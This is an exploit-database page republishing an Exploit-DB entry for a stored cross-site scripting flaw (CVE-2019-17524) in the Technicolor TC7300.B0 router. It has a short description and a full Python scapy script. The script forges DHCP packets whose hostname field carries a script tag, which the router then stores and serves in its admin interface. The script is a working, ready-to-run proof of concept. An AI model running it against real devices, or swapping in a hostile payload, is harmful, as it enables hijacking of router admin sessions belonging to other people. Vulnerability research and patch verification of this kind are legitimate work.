header-logo
Suggest Exploit
vendor:
TC7300.B0
by:
Luis Stefan
5.4
CVSS
MEDIUM
Persistent Cross-Site Scripting
79
CWE
Product Name: TC7300.B0
Affected Version From: TC7300.B0 - STFA.51.20
Affected Version To: TC7300.B0 - STFA.51.20
Patch Exists: YES
Related CWE: CVE-2019-17524
CPE: h:technicolor:tc7300.b0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: macOS Mojave and Catalina
2019

Technicolor TC7300.B0 – ‘hostname’ Persistent Cross-Site Scripting

This script is used to exploit a XSS vulnerability found in a Technicolor device. The vulnerability is triggered when a DHCP request is sent with a malicious hostname parameter, which is then stored in the device's configuration. This allows an attacker to execute arbitrary JavaScript code in the context of the user's browser when they access the device's web interface.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: Luis Stefan
# Vendor Homepage: https://www.technicolor.com/
# Software Link: N/A
# Version: TC7300.B0 - STFA.51.20
# Tested on: macOS Mojave and Catalina
# CVE : 

#!/usr/bin/env python3
__author__ = "Luis Stefan"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "luis.ss@protonmail.com"
__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""

from enum import IntEnum
from scapy.all import *
import codecs, threading, time

# Define your network interface
interface = 'en0'
# Insert your interface card mac address
mac = 'xx:xx:xx:xx:xx:xx'
broadcast = 'ff:ff:ff:ff:ff:ff'
mac_hxd = codecs.decode(mac.replace(':', ''),'hex')

class Bootp(IntEnum):
    Discover = 1
    Offer = 2
    Request = 3
    Decline = 4
    Ack = 5
    Nak = 6
    Release = 7

def dhcp_discover():
    disc_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'discover'), 'end'])
    sendp(disc_pkt, iface=interface)

def dhcp_request(pkt):
    yraddr = pkt['BOOTP'].yraddr
    # gwaddr == Gateway Ip Address
    gwaddr = '192.168.0.1'
    param_req_list = []
    hostname = "<script>alert('XSS triggered')</script>"
    req_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
                      ('requested_addr', yraddr), ('hostname', hostname), 'end'])
    sendp(req_pkt, iface=interface)

def dhcp(pkt):
    print(pkt.display())
    print("#############################################################")
    if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
        dhcp_request(pkt)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
        print("Server Acknowledged")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
        print("Server Declined")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
        print("Server Nak")
        sys.exit(0)


def ver_dhcp():
    print("Verifying DHCP port traffic..")
    sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
    sys.exit(0)


def main():
    t1 = threading.Thread(target=ver_dhcp, args=())
    t1.setDaemon = True
    t1.start()
    time.sleep(2)
    dhcp_discover()


if __name__ == "__main__":
    main()

Navigation

Suggest Exploit

Services By CQR